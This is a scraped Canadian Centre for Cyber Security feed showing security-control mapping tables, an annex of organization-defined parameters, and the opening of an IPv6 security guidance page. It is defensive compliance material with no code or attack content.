03.11.02</a></td> </tr><tr><td>RA-05(05)</td> <td>Vulnerability monitoring and scanning: Privileged access</td> <td>ORC</td> <td>none</td> </tr><tr><td>RA-05(11)</td> <td>Vulnerability monitoring and scanning: Public disclosure program</td> <td>NCO</td> <td>none</td> </tr><tr><td>RA-07</td> <td>Risk response</td> <td>C</td> <td><a href="#03-11-04">Risk response 03.11.04</a></td> </tr><tr><td>RA-09</td> <td>Criticality analysis</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab17"><caption>Table 17: System and services acquisition (SA)</caption> <thead><tr class="active"><th
class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>SA-01</td> <td>System and services acquisition policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>SA-02</td> <td>Allocation of resources</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-03</td> <td>System development life cycle</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-04</td> <td>Acquisition process</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-04(01)</td> <td>Acquisition process: Functional properties of controls</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-04(09)</td> <td>Acquisition process: Functions, ports, protocols, and services in use</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-04(10)</td> <td>Acquisition process: Use of approved digital credential products</td> <td>GC</td> <td>none</td> </tr><tr><td>SA-04(12)</td> <td>Acquisition process: Data ownership</td> <td>GC</td> <td>none</td> </tr><tr><td>SA-05</td> <td>System documentation</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-08</td> <td>Security and privacy engineering principles</td> <td>C</td> <td><a href="#03-16-01">Security engineering principles 03.16.01</a></td> </tr><tr><td>SA-09</td> <td>External system services</td> <td>C</td> <td><a href="#03-16-03">External system services 03.16.03</a></td> </tr><tr><td>SA-09(01)</td> <td>External system services: Risk assessments and organizational approvals</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-09(02)</td> <td>External system services: Identification of functions, ports, protocols, and services</td> <td>ORC</td> <td>none</td> </tr><tr><td>SA-10</td> <td>Developer configuration management</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-10(01)</td> <td>Developer configuration
management: Software and firmware integrity verification</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-11</td> <td>Developer testing and evaluation</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-15</td> <td>Development process, standards, and tools</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-15(03)</td> <td>Development process, standards, and tools: Criticality Analysis</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-16</td> <td>Developer provided training</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-17</td> <td>Developer security and privacy architecture and design</td> <td>NCO</td> <td>none</td> </tr><tr><td>SA-22</td> <td>Unsupported system components</td> <td>C</td> <td><a href="#03-16-02">Unsupported system components 03.16.02</a></td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab18"><caption>Table 18: System and communications protection (SC)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>SC-01</td> <td>System and communications protection policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>SC-02</td> <td>Separation of system and user functionality</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-04</td> <td>Information in shared system resources</td> <td>C</td> <td><a href="#03-13-04">Information in shared system resources 03.13.04</a></td> </tr><tr><td>SC-05</td> 
<td>Denial-of-service protection</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-05(02)</td> <td>Denial-of-service protection: Capacity, bandwidth, and redundancy</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-05(03)</td> <td>Denial-of-service protection: Detection and monitoring</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-07</td> <td>Boundary protection</td> <td>C</td> <td><a href="#03-13-01">Boundary protection 03.13.01</a></td> </tr><tr><td>SC-07(03)</td> <td>Boundary protection: Access points</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-07(04)</td> <td>Boundary protection: External telecommunications services</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-07(05)</td> <td>Boundary protection: Deny by default – allow by exception</td> <td>C</td> <td><a href="#03-13-06">Network communications – deny by default – allow by exception 03.13.06</a></td> </tr><tr><td>SC-07(07)</td> <td>Boundary protection: Split tunneling for remote devices</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-07(08)</td> <td>Boundary protection: Route traffic to authenticated proxy servers</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-07(09)</td> <td>Boundary protection: Restrict threatening outgoing communications traffic</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-07(11)</td> <td>Boundary protection: Incoming communications traffic</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-07(12)</td> <td>Boundary protection: Host-based protection</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-07(13)</td> <td>Boundary protection: Isolation of security tools, mechanisms, and support components</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-08</td> <td>Transmission confidentiality and integrity</td> <td>C</td> <td><a href="#03-13-08">Transmission and storage confidentiality 03.13.08</a></td> </tr><tr><td>SC-08(01)</td> <td>Transmission confidentiality and integrity: Cryptographic protection</td> <td>C</td> <td><a href="#03-13-08">Transmission and storage confidentiality 
03.13.08</a></td> </tr><tr><td>SC-10</td> <td>Network disconnect</td> <td>C</td> <td><a href="#03-13-09">Network disconnect 03.13.09</a></td> </tr><tr><td>SC-12</td> <td>Cryptographic key establishment and management</td> <td>C</td> <td><a href="#03-13-10">Cryptographic key establishment and management 03.13.10</a></td> </tr><tr><td>SC-12(01)</td> <td>Cryptographic key establishment and management: Availability</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-13</td> <td>Cryptographic protection</td> <td>C</td> <td><a href="#03-13-11">Cryptographic protection 03.13.11</a></td> </tr><tr><td>SC-15</td> <td>Collaborative computing devices and applications</td> <td>C</td> <td><a href="#03-13-12">Collaborative computing devices and applications 03.13.12</a></td> </tr><tr><td>SC-15(03)</td> <td>Collaborative computing devices and applications: Disabling and removal in secure work areas</td> <td>GC</td> <td>none</td> </tr><tr><td>SC-17</td> <td>Public key infrastructure certificates</td> <td>GC</td> <td>none</td> </tr><tr><td>SC-18</td> <td>Mobile code</td> <td>C</td> <td><a href="#03-13-13">Mobile code 03.13.13</a></td> </tr><tr><td>SC-18(01)</td> <td>Mobile code: Identify unacceptable code and take corrective actions</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-18(02)</td> <td>Mobile code: Acquisition, development, and use</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-18(03)</td> <td>Mobile code: Prevent downloading and execution</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-18(04)</td> <td>Mobile code: Prevent automatic execution</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-18(05)</td> <td>Mobile code: Allow execution only in confined environments</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-20</td> <td>Secure name/address resolution service (authoritative source)</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-21</td> <td>Secure name/address resolution service (recursive or caching resolver)</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-22</td> 
<td>Architecture and provisioning for name/address resolution service</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-23</td> <td>Session authenticity</td> <td>C</td> <td><a href="#03-13-15">Session authenticity 03.13.15</a></td> </tr><tr><td>SC-23(01)</td> <td>Session authenticity: Invalidate session identifiers at logout</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-23(03)</td> <td>Session authenticity: Unique system-generated session identifiers</td> <td>ORC</td> <td>none</td> </tr><tr><td>SC-28</td> <td>Protection of information at rest</td> <td>C</td> <td><a href="#03-13-08">Transmission and storage confidentiality 03.13.08</a></td> </tr><tr><td>SC-28(01)</td> <td>Protection of information at rest: Cryptographic protection</td> <td>C</td> <td><a href="#03-13-08">Transmission and storage confidentiality 03.13.08</a></td> </tr><tr><td>SC-29</td> <td>Heterogeneity</td> <td>NCO</td> <td>none</td> </tr><tr><td>SC-39</td> <td>Process isolation</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab19"><caption>Table 19: System and information integrity (SI)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>SI-01</td> <td>System and information integrity policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>SI-02</td> <td>Flaw remediation</td> <td>C</td> <td><a 
href="#03-14-01">Flaw remediation 03.14.01</a></td> </tr><tr><td>SI-02(02)</td> <td>Flaw remediation: Automated flaw remediation status</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-02(06)</td> <td>Flaw remediation: Removal of previous versions of software and firmware</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-03</td> <td>Malicious code protection</td> <td>C</td> <td><a href="#03-14-02">Malicious code protection 03.14.02</a></td> </tr><tr><td>SI-03(04)</td> <td>Malicious code protection: Updates only by privileged users</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04</td> <td>System monitoring</td> <td>C</td> <td><a href="#03-14-06">System monitoring 03.14.06</a></td> </tr><tr><td>SI-04(02)</td> <td>System monitoring: Automated tools and mechanisms for real-time analysis</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04(04)</td> <td>System monitoring: Inbound and outbound communications traffic</td> <td>C</td> <td><a href="#03-14-06">System monitoring 03.14.06</a></td> </tr><tr><td>SI-04(05)</td> <td>System monitoring: System-generated alerts</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04(10)</td> <td>System monitoring: Visibility of encrypted communications</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04(11)</td> <td>System monitoring: Analyze communications traffic anomalies</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04(12)</td> <td>System monitoring: Automated organization-generated alerts</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04(13)</td> <td>System monitoring: Analyze traffic and event patterns</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04(14)</td> <td>System monitoring: Wireless intrusion detection</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-04(15)</td> <td>System monitoring: Wireless to wireline communications</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-05</td> <td>Security alerts, advisories, and directives</td> <td>C</td> <td><a href="#03-14-03">Security alerts, advisories, and directives 03.14.03</a></td> 
</tr><tr><td>SI-07</td> <td>Software, firmware, and information integrity</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-07(01)</td> <td>Software, firmware, and information integrity: Integrity checks</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-07(02)</td> <td>Software, firmware, and information integrity: Automated notifications of integrity violations</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-07(03)</td> <td>Software, firmware, and information integrity: Centrally-managed integrity tools</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-07(07)</td> <td>Software, firmware, and information integrity: Integration of detection and response</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-08</td> <td>Spam protection</td> <td>ORC</td> <td>none</td> </tr><tr><td>SI-08(02)</td> <td>Spam protection: Automatic updates</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-10</td> <td>Information input validation</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-11</td> <td>Error handling</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-12</td> <td>Information management and retention</td> <td>C</td> <td><a href="#03-14-08">Information management and retention 03.14.08</a></td> </tr><tr><td>SI-16</td> <td>Memory protection</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-400</td> <td>Dedicated administration workstation</td> <td>C</td> <td><a href="#03-14-09">Dedicated administration workstation 03.14.09</a></td> </tr></tbody></table></div> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab20"><caption>Table 20: Supply chain risk management (SR)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" 
scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>SR-01</td> <td>Supply chain risk management policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>SR-02</td> <td>Supply chain risk management plan</td> <td>C</td> <td><a href="#03-17-01">Supply chain risk management plan 03.17.01</a></td> </tr><tr><td>SR-02(01)</td> <td>Supply chain risk management plan: Establish <abbr title="supply chain risk management">SCRM</abbr> team</td> <td>NCO</td> <td>none</td> </tr><tr><td>SR-03</td> <td>Supply chain controls and processes</td> <td>C</td> <td><a href="#03-17-03">Supply chain requirements and processes 03.17.03</a></td> </tr><tr><td>SR-05</td> <td>Acquisition strategies, tools, and methods</td> <td>C</td> <td><a href="#03-17-02">Acquisition strategies, tools, and methods 03.17.02</a></td> </tr><tr><td>SR-06</td> <td>Supplier assessments and reviews</td> <td>C</td> <td><a href="#03-11-01">Risk assessment 03.11.01</a></td> </tr><tr><td>SR-08</td> <td>Notification agreements</td> <td>NCO</td> <td>none</td> </tr><tr><td>SR-10</td> <td>Inspection of systems or components</td> <td>NCO</td> <td>none</td> </tr><tr><td>SR-11</td> <td>Component authenticity</td> <td>NCO</td> <td>none</td> </tr><tr><td>SR-11(01)</td> <td>Component authenticity: Anti-counterfeit training</td> <td>NCO</td> <td>none</td> </tr><tr><td>SR-11(02)</td> <td>Component authenticity: Configuration control for component service and repair</td> <td>NCO</td> <td>none</td> </tr><tr><td>SR-12</td> <td>Component disposal</td> <td>ORC</td> <td>none</td> </tr></tbody></table></div> </section>
<section><h2 class="text-info" id="AB">Annex B Organization-defined parameters</h2> <p>This appendix lists the organization-defined parameters (ODPs) that are included in the security requirements in Section 3. The <abbr title="organization-defined parameter">ODP</abbr>s are listed sequentially by requirement family, beginning with the first requirement containing an <abbr title="organization-defined parameter">ODP</abbr> in the Access Control (AC) family and ending with the last requirement containing an <abbr title="organization-defined parameter">ODP</abbr> in the Supply Chain Risk Management (SR) family.</p> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab21"><caption>Table 21: Organization-defined parameters</caption> <thead><tr class="active"><th class="text-center" scope="col">Security requirement</th> <th class="text-center" scope="col">Organization-defined parameter</th> </tr></thead><tbody><tr><td><a href="#03-01-01">Account management 03.01.01</a>.F.02</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-01-01">Account management 03.01.01</a>.G.01</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-01-01">Account management 03.01.01</a>.G.02</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-01-01">Account management 03.01.01</a>.G.03</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-01-01">Account management 03.01.01</a>.H</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-01-01">Account management 03.01.01</a>.H</td> <td>[Assignment: organization-defined circumstances]</td> </tr><tr><td><a href="#03-01-05">Least privilege 03.01.05</a>.B</td> <td>[Assignment: organization-defined security functions]</td> </tr><tr><td><a href="#03-01-05">Least privilege 03.01.05</a>.B</td> 
<td>[Assignment: organization-defined security-relevant information]</td> </tr><tr><td><a href="#03-01-05">Least privilege 03.01.05</a>.C</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-01-06">Least privilege – privileged accounts 03.01.06</a>.A</td> <td>[Assignment: organization-defined personnel or roles]</td> </tr><tr><td><a href="#03-01-08">Unsuccessful logon attempts 03.01.08</a>.A</td> <td>[Assignment: organization-defined number]</td> </tr><tr><td><a href="#03-01-08">Unsuccessful logon attempts 03.01.08</a>.A</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-01-08">Unsuccessful logon attempts 03.01.08</a>.B</td> <td>[Selection (one or more): lock the account or node for an [Assignment: organization-defined time period]; lock the account or node until released by an administrator; delay next logon prompt; notify system administrator; take other action]</td> </tr><tr><td><a href="#03-01-10">Device lock 03.01.10</a>.A</td> <td>[Selection (one or more): initiating a device lock after [Assignment: organization-defined time period] of inactivity; requiring the user to initiate a device lock before leaving the system unattended]</td> </tr><tr><td><a href="#03-01-11">Session termination 03.01.11</a></td> <td>[Assignment: organization-defined conditions or trigger events requiring session disconnect]</td> </tr><tr><td><a href="#03-01-20">Use of external systems 03.01.20</a>.B</td> <td>[Assignment: organization-defined security requirements]</td> </tr><tr><td><a href="#03-02-01">Literacy training and awareness 03.02.01</a>.A.01</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-02-01">Literacy training and awareness 03.02.01</a>.A.02</td> <td>[Assignment: organization-defined events]</td> </tr><tr><td><a href="#03-02-01">Literacy training and awareness 03.02.01</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a 
href="#03-02-01">Literacy training and awareness 03.02.01</a>.B</td> <td>[Assignment: organization-defined events]</td> </tr><tr><td><a href="#03-02-02">Role-based training 03.02.02</a>.A.01</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-02-02">Role-based training 03.02.02</a>.A.02</td> <td>[Assignment: organization-defined events]</td> </tr><tr><td><a href="#03-02-02">Role-based training 03.02.02</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-02-02">Role-based training 03.02.02</a>.B</td> <td>[Assignment: organization-defined events]</td> </tr><tr><td><a href="#03-03-01">Event logging 03.03.01</a>.A</td> <td>[Assignment: organization-defined event types]</td> </tr><tr><td><a href="#03-03-01">Event logging 03.03.01</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-03-04">Response to audit logging process failures 03.03.04</a>.A</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-03-04">Response to audit logging process failures 03.03.04</a>.B</td> <td>[Assignment: organization-defined additional actions]</td> </tr><tr><td><a href="#03-03-05">Audit record review, analysis, and reporting 03.03.05</a>.A</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-03-07">Time stamps 03.03.07</a>.B</td> <td>[Assignment: organization-defined granularity of time measurement]</td> </tr><tr><td><a href="#03-04-01">Baseline configuration 03.04.01</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-04-02">Configuration settings 03.04.02</a>.A</td> <td>[Assignment: organization-defined configuration settings]</td> </tr><tr><td><a href="#03-04-06">Least functionality 03.04.06</a>.B</td> <td>[Assignment: organization-defined functions, ports, protocols, connections, and/or services]</td> </tr><tr><td><a href="#03-04-06">Least functionality 03.04.06</a>.C</td> 
<td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-04-08">Authorized software – allow by exception 03.04.08</a>.C</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-04-10">System component inventory 03.04.10</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-04-12">System and component configuration for high-risk areas 03.04.12</a>.A</td> <td>[Assignment: organization-defined system configurations]</td> </tr><tr><td><a href="#03-04-12">System and component configuration for high-risk areas 03.04.12</a>.B</td> <td>[Assignment: organization-defined security requirements]</td> </tr><tr><td><a href="#03-05-01">User identification, authentication, and re-authentication 03.05.01</a>.B</td> <td>[Assignment: organization-defined circumstances or situations requiring re-authentication]</td> </tr><tr><td><a href="#03-05-02">Device identification and authentication 03.05.02</a></td> <td>[Assignment: organization-defined devices or types of devices]</td> </tr><tr><td><a href="#03-05-05">Identifier management 03.05.05</a>.C</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-05-05">Identifier management 03.05.05</a>.D</td> <td>[Assignment: organization-defined characteristic identifying individual status]</td> </tr><tr><td><a href="#03-05-07">Password management 03.05.07</a>.A</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-05-07">Password management 03.05.07</a>.F</td> <td>[Assignment: organization-defined composition and complexity rules]</td> </tr><tr><td><a href="#03-05-12">Authenticator management 03.05.12</a>.E</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-05-12">Authenticator management 03.05.12</a>.E</td> <td>[Assignment: organization-defined events]</td> </tr><tr><td><a href="#03-06-02">Incident monitoring, reporting, and response assistance 
03.06.02</a>.B</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-06-02">Incident monitoring, reporting, and response assistance 03.06.02</a>.C</td> <td>[Assignment: organization-defined authorities]</td> </tr><tr><td><a href="#03-06-03">Incident response testing 03.06.03</a></td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-06-04">Incident response training 03.06.04</a>.A.01</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-06-04">Incident response training 03.06.04</a>.A.03</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-06-04">Incident response training 03.06.04</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-06-04">Incident response training 03.06.04</a>.B</td> <td>[Assignment: organization-defined events]</td> </tr><tr><td><a href="#03-08-07">Media use 03.08.07</a>.A</td> <td>[Assignment: organization-defined types of system media]</td> </tr><tr><td><a href="#03-09-01">Personnel screening 03.09.01</a>.B</td> <td>[Assignment: organization-defined conditions requiring rescreening]</td> </tr><tr><td><a href="#03-09-02">Personnel termination and transfer 03.09.02</a>.A.01</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-10-01">Physical access authorizations 03.10.01</a>.C</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-10-02">Monitoring physical access 03.10.02</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-10-02">Monitoring physical access 03.10.02</a>.B</td> <td>[Assignment: organization-defined events or potential indications of events]</td> </tr><tr><td><a href="#03-10-06">Alternate work site 03.10.06</a>.B</td> <td>[Assignment: organization-defined security requirements]</td> </tr><tr><td><a href="#03-11-01">Risk assessment 03.11.01</a>.B</td> 
<td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-11-02">Vulnerability monitoring and scanning 03.11.02</a>.A</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-11-02">Vulnerability monitoring and scanning 03.11.02</a>.B</td> <td>[Assignment: organization-defined response times]</td> </tr><tr><td><a href="#03-11-02">Vulnerability monitoring and scanning 03.11.02</a>.C</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-12-01">Security assessment 03.12.01</a></td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-12-05">Information exchange 03.12.05</a>.A</td> <td>[Selection (one or more): interconnection security agreements; information exchange security agreements; memoranda of understanding or agreement; service-level agreements; user agreements; nondisclosure agreements; other types of agreements]</td> </tr><tr><td><a href="#03-12-05">Information exchange 03.12.05</a>.C</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-13-09">Network disconnect 03.13.09</a></td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-13-10">Cryptographic key establishment and management 03.13.10</a></td> <td>[Assignment: organization-defined requirements for key establishment and management]</td> </tr><tr><td><a href="#03-13-11">Cryptographic protection 03.13.11</a></td> <td>[Assignment: organization-defined types of cryptography]</td> </tr><tr><td><a href="#03-13-12">Collaborative computing devices and applications 03.13.12</a>.A</td> <td>[Assignment: organization-defined exceptions where remote activation is to be allowed]</td> </tr><tr><td><a href="#03-14-01">Flaw remediation 03.14.01</a>.B</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-14-02">Malicious code protection 03.14.02</a>.C.01</td> <td>[Assignment: organization-defined frequency]</td> 
</tr><tr><td><a href="#03-15-01">Policy and procedures 03.15.01</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-15-02">System security plan 03.15.02</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-15-03">Rules of behaviour 03.15.03</a>.D</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-16-01">Security engineering principles 03.16.01</a></td> <td>[Assignment: organization-defined systems security engineering principles]</td> </tr><tr><td><a href="#03-16-03">External system services 03.16.03</a>.A</td> <td>[Assignment: organization-defined security requirements]</td> </tr><tr><td><a href="#03-17-01">Supply chain risk management plan 03.17.01</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-17-03">Supply chain requirements and processes 03.17.03</a>.B</td> <td>[Assignment: organization-defined security requirements]</td> </tr></tbody></table></div> </section> <aside class="wb-fnote" role="note"><h2 id="reference">Notes</h2> <dl><dt>Footnote 1</dt> <dd id="fn1"> <p>System that is used or operated by a <abbr title="Government of Canada">GC</abbr> department or agency, by a contractor, or by another organization on behalf of a department or agency. The term system as used in this publication includes people, processes and technologies involved in the handling, processing, storage or transmission of specified information. 
Systems can include operational technology (OT), information technology (IT), Internet of Things (IoT) devices, industrial IoT (IIoT) devices, specialized systems, cyber-physical systems, embedded systems, and sensors.</p> </dd> <dt>Footnote 2</dt> <dd id="fn2"> <p>Components include workstations, servers, notebook computers, smartphones, tablets, input and output devices, network components, operating systems, virtual machines, database management systems, and applications.</p> </dd> </dl></aside></div> </div> </div> </div> </div> </div> </div> </article>

  • Series of joint guidance on modern defensible architecture
    by Canadian Centre for Cyber Security on October 23, 2025 at 2:05 pm

    MDA is ASD’s ACSC initiative to ensure that organizations consider and actively apply secure design and architecture in their cyber security strategy, resilience planning and implementations. This series of guidance includes 3 publications.

  • Security considerations for Internet Protocol version 6 (ITSM.80.003)
    by Canadian Centre for Cyber Security on October 10, 2025 at 5:23 pm

    <article data-history-node-id="6622" about="/en/guidance/security-considerations-internet-protocol-version-6-itsm80003" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout--onecol"> <div class="layout__region layout__region--content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><div class="row"> <div class="col-md-4 col-sm-12 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>October 2025</strong></p> </div> <div class="col-md-4 col-sm-12 hidden-xs hidden-sm"> <p class="text-center"><strong>Management series</strong></p> </div> <div class="col-md-4 col-sm-12 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSM.80.003</strong></p> </div> <div class="col-md-12 mrgn-tp-lg"> <div class="mrgn-bttm-md well well-sm col-md-4 col-sm-12 col-xs-12 pull-right mrgn-lft-md"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/security-considerations-for-Internet-Protocol-version-6-ITSM.80.003.pdf">Security considerations for Internet Protocol version 6 – ITSM.80.003 (PDF, 552 Kb)</a></p> </div> <section><h2 class="text-info mrgn-tp-0">Foreword</h2> <p>This is an <span class="text-uppercase">unclassified</span> publication, issued under the authority of the Head of the Canadian Centre for Cyber Security (Cyber Centre). 
For more information, contact the Cyber Centre:</p> <p><span class="glyphicon glyphicon-envelope"></span><span class="wb-inv">email</span> <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a> |<span class="glyphicon glyphicon-phone"></span><span class="wb-inv">Mobile</span> <a href="tel:613-949-7048">613-949-7048</a> or <a href="tel:+1-833-292-3788">1<span>‑</span>833<span>‑</span>CYBER<span>‑</span>88</a></p> </section></div> </div> <section><h2 class="text-info">Effective date</h2> <p>This publication takes effect on October 10, 2025.</p> </section><section><h2 class="text-info">Revision history</h2> <ol><li><strong>First release:</strong> October 10, 2025.</li> </ol></section><section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of Contents</h2> </summary><ul class="list-unstyled mrgn-tp-lg"><li><a href="#1">1 Introduction</a> <ul><li><a href="#1.1">1.1 Internet Protocol version 6</a></li> <li><a href="#1.2">1.2 Internet Protocol version 6 enhancements</a> <ul><li><a href="#1.2.1">1.2.1 IP security support</a></li> <li><a href="#1.2.2">1.2.2 Autoconfiguration</a></li> <li><a href="#1.2.3">1.2.3 Neighbor discovery</a></li> <li><a href="#1.2.4">1.2.4 Dynamic host configuration protocol security</a></li> <li><a href="#1.2.5">1.2.5 Extension headers</a></li> <li><a href="#1.2.6">1.2.6 No broadcast addresses</a></li> </ul></li> <li><a href="#1.3">1.3 Problem statement</a></li> <li><a href="#1.4">1.4 Threat context</a> <ul><li><a href="#1.4.1">1.4.1 Protocol tunneling</a></li> <li><a href="#1.4.2">1.4.2 Distributed denial-of-service attacks</a></li> <li><a href="#1.4.3">1.4.3 Command and control</a></li> <li><a href="#1.4.4">1.4.4 Network device misconfigurations</a></li> <li><a href="#1.4.5">1.4.5 Network service discovery</a></li> </ul></li> </ul></li> <li><a href="#2">2 Security considerations</a> <ul><li><a href="#2.1">2.1 Migration risks</a></li> <li><a href="#2.2">2.2 Procurement and testing</a></li> <li><a href="#2.3">2.3 Target 
